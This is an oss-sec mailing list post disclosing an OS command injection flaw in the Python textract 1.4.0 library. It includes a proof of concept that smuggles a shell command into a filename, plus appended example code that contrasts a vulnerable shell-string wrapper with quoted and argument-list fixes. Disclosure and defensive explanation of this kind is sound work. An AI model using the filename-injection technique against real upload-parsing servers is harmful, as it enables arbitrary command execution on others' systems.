oss-sec mailing list archives
CVE request - textract 1.4.0 - OS Command Injection
From: Pierre Ernst <pernst () salesforce com>
Date: Thu, 20 Oct 2016 17:40:50 -0400
The Python textract component (https://github.com/deanmalmgren/textract/tree/v1.4.0) is vulnerable to OS command injection. This fork contains a fix: https://github.com/pierre-ernst/textract

Parsing a file with a malicious name leads to arbitrary OS command injection. This is especially risky when parsing user-supplied files on a server (e.g. uploaded files).

PoC:

import textract
import sys
import os

# create a file with a malicious name and arbitrary content
fileName = './test";gnome-calculator;#.pdf'
file = open(fileName, 'w+')
file.write('Pierre Ernst, Salesforce')
file.close()

# parse newly created file
text = textract.process(fileName)
print(text)

# cleanup
os.remove(fileName)

--
Pierre Ernst
Salesforce
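The bug class behind this report, as an added example that is not textract's code and not part of the original post: a wrapper that splices an untrusted filename into a shell command string next to the same wrapper written with an argument list. The `vulnerable_extract` function is an assumed, simplified stand-in for a converter wrapper, `cat` stands in for a real converter such as pdftotext so the expected result is the file's own bytes, and `echo INJECTED` replaces the original gnome-calculator payload so the demo runs headless and offline. The sample file is constructed inline.

```python
"""Shell-string filename splicing versus an argument list (added example).

Assumptions: CONVERTER is a stand-in for whatever command a real wrapper
shells out to; the filename payload uses `echo` so the injection is
observable in captured stdout instead of launching a GUI program.
"""
import os
import shlex
import subprocess
import tempfile

# Stand-in converter (assumption): `cat` just returns the file contents, so a
# correct extractor must return exactly what was written to the file.
CONVERTER = "cat"


def vulnerable_extract(path: str) -> str:
    """Exploitable pattern: the untrusted path is pasted into a shell string.

    Wrapping the path in double quotes does not help once the path itself
    contains a double quote: the attacker closes the quote, appends `;cmd;`
    and comments out the rest with `#`.
    """
    cmd = '%s "%s"' % (CONVERTER, path)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def quoted_extract(path: str) -> str:
    """Mitigation if a shell is unavoidable: shlex.quote() makes the path a
    single shell word regardless of quotes, semicolons or hashes in it."""
    cmd = "%s %s" % (CONVERTER, shlex.quote(path))
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True,
                          check=True)
    return proc.stdout


def hardened_extract(path: str) -> str:
    """Preferred fix: no shell at all. The path becomes one argv entry for
    execve(), so no character in it is interpreted."""
    proc = subprocess.run([CONVERTER, path], capture_output=True, text=True,
                          check=True)
    return proc.stdout


def demo(payload_cmd: str = "echo INJECTED") -> dict:
    """Create a file whose name carries a shell payload (same shape as the
    PoC filename above) and run all three extractors on it."""
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed sample: name mirrors './test";gnome-calculator;#.pdf'.
        name = 'test";%s;#.pdf' % payload_cmd
        path = os.path.join(tmp, name)
        with open(path, "w") as fh:
            fh.write("Pierre Ernst, Salesforce")
        return {
            "vulnerable": vulnerable_extract(path),
            "quoted": quoted_extract(path),
            "hardened": hardened_extract(path),
        }


if __name__ == "__main__":
    for variant, output in demo().items():
        print("%-10s -> %r" % (variant, output))
```

Running it shows the vulnerable variant returning only `INJECTED` (the shell ran `cat "<dir>/test"`, which fails, then the injected `echo`, then ignored the rest as a comment), while both the quoted and the argument-list variants return the file's real contents. The argument-list form is the one to prefer: it removes the shell parser from the path entirely instead of relying on quoting it correctly every time.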
Current thread:
- CVE request - textract 1.4.0 - OS Command Injection Pierre Ernst (Oct 20)
- Re: CVE request - textract 1.4.0 - OS Command Injection Pierre Ernst (Nov 17)